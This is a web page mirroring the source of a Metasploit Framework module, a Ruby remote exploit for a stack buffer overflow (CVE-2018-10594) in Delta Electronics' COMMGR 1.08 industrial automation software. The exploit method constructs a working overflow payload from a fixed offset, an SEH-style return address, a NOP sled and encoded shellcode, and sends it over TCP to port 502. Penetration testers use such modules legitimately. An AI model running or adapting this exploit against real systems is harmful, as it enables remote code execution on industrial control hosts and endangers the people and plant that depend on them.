Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/scada/delta_ia_commgr_bof.rb
19721 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = NormalRanking
8
9
include Msf::Exploit::Remote::Tcp
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
16
'Description' => %q{
17
This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
18
Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
19
crafted packets. This module has been tested successfully on Delta Electronics Delta
20
Industrial Automation COMMGR 1.08 over
21
Windows XP SP3,
22
Windows 7 SP1, and
23
Windows 8.1.
24
},
25
'Author' => [
26
'ZDI', # Initial discovery
27
't4rkd3vilz', # PoC
28
'hubertwslin' # Metasploit module
29
],
30
'References' => [
31
[ 'CVE', '2018-10594' ],
32
[ 'BID', '104529' ],
33
[ 'ZDI', '18-586' ],
34
[ 'ZDI', '18-588' ],
35
[ 'EDB', '44965' ],
36
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01' ]
37
],
38
'Payload' => {
39
'Space' => 640,
40
'DisableNops' => true,
41
'BadChars' => "\x00"
42
},
43
'DefaultOptions' => {
44
'EXITFUNC' => 'thread',
45
},
46
'Platform' => 'win',
47
'Targets' => [
48
[
49
'COMMGR 1.08 / Windows Universal',
50
{
51
'Ret' => 0x00401e14, # p/p/r COMMGR.exe
52
'Offset' => 4164
53
}
54
],
55
],
56
'DisclosureDate' => '2018-07-02',
57
'DefaultTarget' => 0,
58
'Notes' => {
59
'Reliability' => UNKNOWN_RELIABILITY,
60
'Stability' => UNKNOWN_STABILITY,
61
'SideEffects' => UNKNOWN_SIDE_EFFECTS
62
}
63
)
64
)
65
66
register_options(
67
[
68
Opt::RPORT(502)
69
]
70
)
71
end
72
73
def exploit
74
data = rand_text_alpha(target['Offset'])
75
data << "\xeb\x27\x90\x90" # jmp short $+27 to the NOP sled
76
data << [target.ret].pack("V")
77
data << make_nops(40)
78
data << payload.encoded
79
80
print_status("Trying target #{target.name}, sending #{data.length} bytes...")
81
connect
82
sock.put(data)
83
disconnect
84
end
85
end
86
87